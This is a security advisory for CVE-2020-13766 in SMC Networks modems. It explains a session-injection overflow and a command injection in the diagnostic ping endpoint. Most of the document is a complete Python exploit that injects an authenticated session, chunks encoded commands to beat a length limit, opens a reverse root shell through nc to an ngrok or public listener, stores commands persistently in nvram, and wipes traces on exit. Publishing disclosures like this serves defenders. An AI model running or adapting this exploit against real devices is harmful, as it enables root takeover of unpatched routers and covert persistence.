SSD Advisory – SMC Networks Session and Command Injection

TL;DR

Find out how we managed to inject an auth session into the device and through it gain a reverse root tcp shell in SMC Networks devices.

Vulnerability Summary

SMC Networks provides many Network products, one of them is Modems.
SMC’s Modems are used to transmit data over between your connected devices in your Network.
A vulnerability in SMC Networks Modems route callback allows attacker to inject code/sessions and gain reverse root shell.

CVE

CVE-2020-13766

Credit

An independent Security Researcher has reported this vulnerability to SSD Secure Disclosure program.

Affected Systems

D3G1604W-4.2.3.8.1-GW_GA,

D3G0804W-3.5.2.7-LAT_GA,

SMCD3GNV5M-3.5.2.5-LAT_GA,

D3G0804W-3.5.2.5-LAT_GA,

SMCD3GNV5M-3.5.1.6.10_GA,

SMCD3GNV5M-3.5.1.6.5-GA,

D3G0804W-3.5.1.7_GA,

SMCD3GNV5M-3.5.1.7_GA,

SMCD3GNV5M-3.5.2.7-LAT_GA,

D3G0804W-3.5.1.6.10_GA,

D3G1604W-4.2.3.6.3-GW_GA,

SMCD3GNV5M-3.5.1.6.3_GA,

D3G0804W-3.5.1.6.3_GA

Vendor Response

We tried to contact the vendor several times via email and twitter, and we were unable to receive any response or acknowledgement to our attempts.

Vulnerability Details

In SMC Networks products the function that handles the “/goform/formParamRedirectUrl” route callback has a parameter “param_str” that is copied on a global object “pCgrGuiObject” at an offset of 0x1c.

This shared object is found in the “/usr/cgr/lib/libgui.so” code. This global object provides many different types of functions including managing and validation of sessions.

Using an unbounded strcpy in the callback mentioned above we are able write a crafted message and overwrite the session data and add our own session to the global object. Subsequent requests sent after this session injection has occurred will show up as authenticated.

Once we are authenticated we can the endpoint “/goform/formSetDiagnosticToolsFmPing”’s “vlu_diagnostic_tools__ping_address” parameter which is not filtered and can be used to inject command into the OS.

The vulnerable code is found inside the “/usr/cgr/bin/modules/diagnostic_tools/diagnostic_tools.so” file.

The parameter we can use to inject data and run it as root, is limited to 32 characters, we therefore need to break any longer commands we want to run to several smaller commands and then chain them together.

Demo

Exploit

In the demo below we are getting simple reverse tcp shell, with the use of ngrok and not using public ip. You can change in the code the ngrok to public ip.

Also ngrok’s ips are riddled with random traffic of the previous user tied to that port. If any such traffic occurred it will throw off the revere shell listener ncat which is why the shell won’t drop. in such case close and restart the script. The endpoint won’t crash if the process is interrupted. Or switch to a public ip:port option.

sbin/env -S -- /usr/bin/python3

import threading
import requests
import os
import time
import re
import subprocess
import sys
import json
import argparse
import gzip
import random
import logging
import urllib3
import urllib.parse
import string 
from base64 import b64encode

class SMC:
	def __init__(self, url, pseudonym, ngrok_auth_token = '', shell_listen_ip = '', shell_listen_port = 8888):
		self.make_model = "SMC"
		self.vuln_type = "Root RCE"
		self.pseudonym = pseudonym
		
		#array of callbacks with functionality with a minumum of [shell, device_check, ...]
		self.functionalities = {
			"DEVICE_CHECK" : [self.device_check,"Checks if device is the target model and version range"],
			"VULNERABLE_CHECK" : [self.vulnerable_check,"Checks if device is vulnerable."],
			"DROP_SHELL" : [self.shell_drop,"Drops an interactive shell using the vulnerability."],
			"EXECUTE_COMMAND" : [self.execute_command,"Executes a single command."],
		}
		url_regex = re.compile(r"http[s]?://((?:[a-zA-Z\.\-]|[0-9]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)(?:[:]([0-9]{1,5}))?", re.IGNORECASE)
		url_match = re.match(url_regex, url)
		if url_match:
			self.url = url.strip("/")
			self.ip = url_match.group(1)
		else:
			logging.critical("Invallid url provided. Exiting...")
			exit(1)
		
		self.ngrok_auth_token = ngrok_auth_token
		self.shell_listen_ip = shell_listen_ip
		self.shell_listen_port = shell_listen_port
		self.cookies = {"session": "19e73828937f05e6f709e29efdb0a82b394141666",}
		self.dir_path = os.path.dirname(os.path.realpath(__file__))
		self.session_injected = False
		self.feedback_already_set_up = False
		self.rtcp_command_sent = False
		# self.rando = "".join(random.choices(string.ascii_uppercase + string.digits, k = 3)) # "SMC" #
		self.cmd_loc = '/tmp/t'
		self.persistent_cmd_loc = '/nvram/0/sys_setup.sh'
		self.shell_prompt = f"{self.make_model}@{self.ip}>|"

		self.configs = []
		self.logs = []

	def present_functionalities(self):
		print("---------------------------------------------------------------------------------------------")
		print("Exp 0.1.3 - {} - {} - by {}".format(self.make_model, self.vuln_type, self.pseudonym))
		for number,(key, functionality) in zip(range(1,len(self.functionalities)+1), self.functionalities.items()) :
			print("\t[{}]-{} => {}".format(number, key, functionality[1]))
		print("\t[{}]-{} => {}".format(0, "EXIT", "Gracefully exit wiping traces of presence."))

	def run(self):
		logging.info("Operating on {} - . - by {}".format(self.url,  self.pseudonym))
		if (self.device_check()):# and self.vulnerable_check()):
			self.present_functionalities()
			choice = float('inf')
			while choice != 0:
				try:
					choice = int(input("----------Choice-> "))
					while (type(choice) == int and 0 < choice <= len(self.functionalities)):
						self.functionalities[list(self.functionalities.keys())[choice - 1]][0]()
						self.present_functionalities()
						choice = int(input("----------Choice-> "))
				except ValueError as e :
					logging.debug(e)
					print("Numbers only!!", end="")
					pass
		else:
			logging.critical(f"Target {self.url} is not available or of the right device type.")
			self.quit()
			exit(1)
		self.quit()

	#FUNCTIONILITY["DEVICE_CHECK"]
	#checks if device is the target model and version
	def device_check(self):
		try:
			logging.info("Checking if the given address is a SMC Device")
			req = requests.get(self.url+"/home.asp", verify=False)
			if req.status_code != 200:
				logging.critical("Invalid response to probe request for device checking, Exiting..")
				return False
			response_html = req.text
			title_regex = re.compile(r".*<title>.*SMC.*</title>.*", re.IGNORECASE)
			if not title_regex.search(response_html):
				logging.critical("The URL does not appear to be a SMC Device, Exiting")
				return False
			# TODO: add more fingerprinting functionality
			logging.info("Device is a SMC Device :!)")
		except Exception as ex:
			logging.critical(f"Error {ex} occured while checking the device")
			return False
		return True
		
    #FUNCTIONILITY["VULNERABLE_CHECK"]
	#check if device is vulnerable
	def vulnerable_check(self):
		logging.info("Checking if the SMC Device is vulnerable.")
		test_code = "".join(random.choices(string.ascii_uppercase + string.digits, k = 10))
		output = self.execute_command(f"echo -n {test_code}", feedback=True)
		self.rtcp_command_sent = False
		if test_code in output:
			logging.info("SMC Device is vulnerable.")
			return True	
		logging.info("SMC Device not is vulnerable. Terminating!!!!!")
		return False

	#FUNCTIONILITY[DROP_SHELL]
	#drop to an interactive shell
	def shell_drop(self):
		listen_port = self.shell_listen_port
		if self.ngrok_auth_token != '':
			listen_port, ngrok_process_handle = self.listen_on_ngrok()
		
		if listen_port is not None :
			t1 = threading.Thread(target=self.listen_for_incoming_shell)
			t1.start()
			try:
				if t1.is_alive():
					command = f"rm /tmp/SMC;mkfifo /tmp/SMC;cat /tmp/SMC|/bin/sh -i 2>&1|nc {self.shell_listen_ip} {listen_port} >/tmp/SMC"
					self.execute_command(command, already_injected=self.rtcp_command_sent)
					self.rtcp_command_sent = True
					logging.info("You should have a shell by now %)")
					logging.info("Run 'kill `ps | grep [c]gr_httpd|awk '{$1=$1};1'|cut -d' ' -f1`;/usr/cgr/bin/cgr_httpd &' to make webportal function normally [RECOMMENDED].")
					t1.join()
			except Exception as e:
				print(e)
				pass
		else:
			logging.debug("Problem setting up a ngrok tunnel to the provided listening port.")
			logging.info("Error.")
		# ngrok_process_handle.terminate()

	#FUNCTIONILITY[EXECUTE_COMMAND]
	def execute_command(self, cmd="", feedback=False, already_injected=False, persistent=False):
		if cmd == "":
			self.rtcp_command_sent = False
			cmd = input("Command : ")
			feedback = False if (str.upper(input("Do you need to see the output of the commad? [Y]/N: ")) == "N") else True
			persistent = True if (str.upper(input("Store the command persistently? Y/[N]: ")) == "Y") else False

		self.inject_session()

		if feedback:
			cmd += " 2>&1 >/usr/cgr/www/vpn/output;"
			if not self.feedback_already_set_up:
				# set up tmp area in www
				feedback_setup_command = "mount -t tmpfs tmpfs /usr/cgr/www/vpn;"
				self.execute_command(feedback_setup_command)
				self.feedback_already_set_up = True

		if persistent:
			cmd = cmd.strip().strip(';')
			cmd += f";echo \"/usr/sbin/iccctl start;{cmd};\">{self.persistent_cmd_loc};"

		logging.info(f"Transmitting command '{cmd}'")
		if not already_injected:
			command = f"rm /tmp/t /usr/cgr/www/vpn/*"
			short_single_command_data = f"vlu_diagnostic_tools__ping_address==$({command})&vlu_diagnostic_tools__ping_count=4&vlu_diagnostic_tools__ping_packetsize=64&subUrl=network_diagnostic_tools.asp"
			requests.post(f"{self.url}/goform/formSetDiagnosticToolsFmPing", cookies=self.cookies, data=short_single_command_data, verify=False)

			# chop_up_command 
			params_format = "vlu_diagnostic_tools__ping_address=$(echo -n '{}'>>{})&vlu_diagnostic_tools__ping_count=4&vlu_diagnostic_tools__ping_packetsize=64&subUrl=network_diagnostic_tools.asp"
			compressed_command = b64encode(gzip.compress(cmd.encode('ascii')))
			logging.debug(f"Transmitting command {cmd} compressed as {compressed_command}")
			cmd_list = [compressed_command[x:x+11] for x in range(0,len(compressed_command),11)]
			for cmd_bit in cmd_list:
				print(".", end="", flush=True)
				# logging.debug(cmd_bit.decode())
				logging.debug("$(echo -n '{}'>>{})".format(urllib.parse.quote(cmd_bit), self.cmd_loc))
				response = requests.post(f"{self.url}/goform/formSetDiagnosticToolsFmPing", cookies=self.cookies, data=params_format.format(urllib.parse.quote(cmd_bit), self.cmd_loc), verify=False)
				logging.debug(f"Response wile transmitting command bit {cmd_bit} => {response.headers}")

		try:
			logging.info(f"Executing command...")
			data = f"vlu_diagnostic_tools__ping_address=$(cat {self.cmd_loc}|base64 -d|zcat|sh)&vlu_diagnostic_tools__ping_count=4&vlu_diagnostic_tools__ping_packetsize=64&subUrl=network_diagnostic_tools.asp"
			response = requests.post(f"{self.url}/goform/formSetDiagnosticToolsFmPing", cookies=self.cookies, timeout=5, data=data, verify=False)
			# logging.info("Done executing command.")
		except requests.exceptions.ReadTimeout:
			pass
		except requests.exceptions.ConnectionError as e:
			logging.info("Target Disconnected")
			pass
			
		if feedback:
			try:
				response = requests.post(f"{self.url}/vpn/output", cookies=self.cookies, timeout=5, data=data, verify=False)
				return response.text
			except requests.exceptions.ReadTimeout:
				pass

	#FUNCTIONILITY[EXIT]
	#reboot seems the cleanest way
	def quit(self):
		if self.session_injected:
			self.execute_command("rm /tmp/t /tmp/SMC; umount /usr/cgr/www/vpn; kill `ps | grep [c]gr_httpd|awk '{$1=$1};1'|cut -d' ' -f1`;/usr/cgr/bin/cgr_httpd &")
		os.system("pkill -xe ngrok")
		os.system("pkill -xe ncat")

	################################# Unique Functions Area ####################
	def inject_session(self):
		if self.session_injected:
			return
		params_format = "param_int=78&param_str=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{}"
		injection_fuzz_list = [f"ÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsession={self.cookies['session']}","ÿÿ","ÿ",""]
		logging.info("Injecting Session!!!")
		for appendee in injection_fuzz_list:
			print(".", end="", flush=True)
			response = requests.post(f"{self.url}/goform/formParamRedirectUrl", cookies=self.cookies, data=params_format.format(appendee), verify=False)
		logging.info("Session injected succesfully!!!")
		self.session_injected = True

	def listen_on_ngrok(self):
		# set up ngrok subprocess
		listen_port = None
		ngrok_process = subprocess.Popen([f"{self.dir_path}/ngrok.exe", "tcp", f"{self.shell_listen_port}", "--authtoken", f"{self.ngrok_auth_token}"], stdout=subprocess.PIPE)
		time.sleep(5)
		localhost_ngrok_monitor_url = "http://localhost:4040/api/tunnels"
		tunnels = requests.get(localhost_ngrok_monitor_url).text #Get the tunnel information
		if tunnels is not None and json.loads(tunnels)['tunnels']:
			j = json.loads(tunnels)
			if self.shell_listen_port == j['tunnels'][0]['config']['addr'].split(':')[1]:
				tunnel_url = j['tunnels'][0]['public_url']
				listen_port = tunnel_url.split(":")[2]
				logging.info(f"Ngrok: Listening on {tunnel_url} -> {j['tunnels'][0]['config']['addr']}")
			else:
				ngrok_process.terminate()
				return None, None
		return listen_port, ngrok_process
		
	def listen_for_incoming_shell(self):
		print("Running ncat.exe: {}".format([f"{self.dir_path}/ncat.exe", "-4", "-l", "-w100s", "-v", "0.0.0.0", f"{self.shell_listen_port}"]))
		with subprocess.Popen([f"{self.dir_path}/ncat.exe", "-4", "-l", "-w100s", "-v", "0.0.0.0", f"{self.shell_listen_port}"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=sys.stdin, universal_newlines=True) as ncat_process:
			ncat_output = ncat_process.stdout.readlines(300)
			print("ncat_output: {}, found?: {}".format(ncat_output, any("Listening" in s for s in ncat_output)))
			ncat_status = ncat_output[1].strip().split()[1]
			print("ncat_status: {}".format(ncat_status))
			if any("Listening" in s for s in ncat_output):
				logging.info(ncat_output[1].strip())
				while ncat_process.poll() is None:
					print(self.shell_prompt, ncat_process.stdout.readline().strip())
			else:
				logging.critical(ncat_output[1].strip())
			ncat_process.terminate()


def parse_ip_port(arg_value, pat=re.compile(r"((?:[a-zA-Z\.\-]|[0-9]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)(?:[:]([0-9]{1,5}))?", re.IGNORECASE)):
	url_match = pat.match(arg_value)
	if not url_match:
		raise argparse.ArgumentTypeError
	return url_match.group(1), url_match.group(2)

if __name__ == "__main__":
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
	# logging.basicConfig(level=logging.DEBUG)
	logging.basicConfig(level=logging.INFO)
	parser = argparse.ArgumentParser(description='SMC Root RCE params')
	parser = argparse.ArgumentParser(description='Required: public ip or ngrok authentication token to use their public ip.')
	parser.add_argument('url', metavar='IP|FQDN', type=str, help='Target URL without path')
	rev_shell_ip = parser.add_mutually_exclusive_group()
	rev_shell_ip.add_argument('--ngrok_auth_token', metavar='auth_token', type=str, nargs=1,
		help='ngrok authentication token to listen on a pulic IP for reverse shell connection.', default=[''])
	rev_shell_ip.add_argument('--listen_ip_port', metavar='ip:port', type=parse_ip_port, nargs=1, default=[('0.tcp.ngrok.io','8888')],
		help='public facing IP and port to get a shell through.')
	args = parser.parse_args()
	SMC(args.url,"unknown", args.ngrok_auth_token[0], args.listen_ip_port[0][0], args.listen_ip_port[0][1]).run()